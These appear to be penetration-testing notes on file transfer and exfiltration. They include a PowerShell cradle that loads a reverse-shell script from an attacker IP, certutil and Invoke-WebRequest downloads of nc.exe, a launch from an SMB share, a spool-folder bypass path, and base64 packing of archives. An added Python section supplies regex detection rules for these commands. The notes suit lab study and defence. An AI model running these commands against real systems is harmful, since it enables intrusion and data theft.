Load PS1 in memory
powershell "IEX(New-Object Net.WebClient).downloadString('http://192.168.119.122/Utilities/Revshells/shell.ps1')"
Windows upload via certutil.exe
certutil.exe -split -urlcache -f http://192.168.119.122/Utilities/Binaries/nc.exe
Windows upload via powershell
powershell Invoke-WebRequest -Uri "http://192.168.119.122/Utilities/Binaries/nc.exe" -OutFile C:\temp\nc.exe
SMBServer is a good option for Windows when dealing with firewalls and when port 80 is needed for catching shells
#Kali
smbserver.py -smb2support a .
#Victim
\\IP\a\nc.exe
File Upload Windows route bypass
C:\Windows\System32\spool\drivers\color
Netcat Transfers
nc 10.10.10.15 4444 < file_to_transfer #sender
nc -lvnp 4444 > file_to_transfer #receiver, start first
SCP transfer (requires ssh access)
scp user@ip:/filename /path #from
scp filename user@ip:/path #to
Data exfiltration via base64
#Linux
zip -e -r exfil.zip dir_name
cat exfil.zip | base64 > exfil.txt
#Windows
powershell Compress-Archive -LiteralPath dir -DestinationPath ./exfil.zip
certutil -encode exfil.zip exfil.txt
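Detection view of the Windows commands above
Added example, not part of the original notes: it matches process-creation command lines against the transfer patterns listed on this page. The rule names, host names and sample events are constructed for illustration.

```python
import re

# Added example: rule names are hypothetical labels, not from any product.
RULES = {
    # In-memory load: IEX combined with Net.WebClient downloadString
    "ps_download_cradle": re.compile(r"\bIEX\b.*Net\.WebClient.*downloadString", re.I),
    # PowerShell download written to disk
    "ps_iwr_to_disk": re.compile(r"\b(Invoke-WebRequest|iwr)\b.*-OutFile\b", re.I),
    # certutil used as a downloader or as a base64 encoder
    "certutil_urlcache": re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I),
    "certutil_encode": re.compile(r"\bcertutil(\.exe)?\b.*-encode\b", re.I),
    # Executable started directly from a UNC share (\\host\share\file.exe)
    "unc_exe_launch": re.compile(r"^\s*\\\\[^\\\s]+\\[^\\\s]+\\\S+\.exe\b", re.I),
    # Anything under the directory this page lists as a bypass path
    "spool_color_dir": re.compile(r"\\spool\\drivers\\color\\", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """Keep only events with at least one hit: (host, rule names, cmdline)."""
    hits = []
    for host, cmdline in events:
        matched = classify(cmdline)
        if matched:
            hits.append((host, matched, cmdline))
    return hits

# Constructed process-creation events (host, command line); not real telemetry.
SAMPLE_EVENTS = [
    ("ws01", "powershell IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/shell.ps1')"),
    ("ws01", "certutil.exe -split -urlcache -f http://192.0.2.10/nc.exe"),
    ("ws02", r'powershell Invoke-WebRequest -Uri "http://192.0.2.10/nc.exe" -OutFile C:\temp\nc.exe'),
    ("ws02", r"\\192.0.2.10\a\nc.exe"),
    ("ws03", "certutil -encode exfil.zip exfil.txt"),
    ("ws03", r"certutil -hashfile C:\temp\setup.exe SHA256"),  # benign use, no hit
    ("ws03", r"C:\Windows\System32\spool\drivers\color\nc.exe"),
]

if __name__ == "__main__":
    for host, rules, cmdline in triage(SAMPLE_EVENTS):
        print(f"{host}: {', '.join(rules)} <- {cmdline}")
```

The certutil rules key on the -urlcache and -encode switches, so routine uses such as -hashfile do not match.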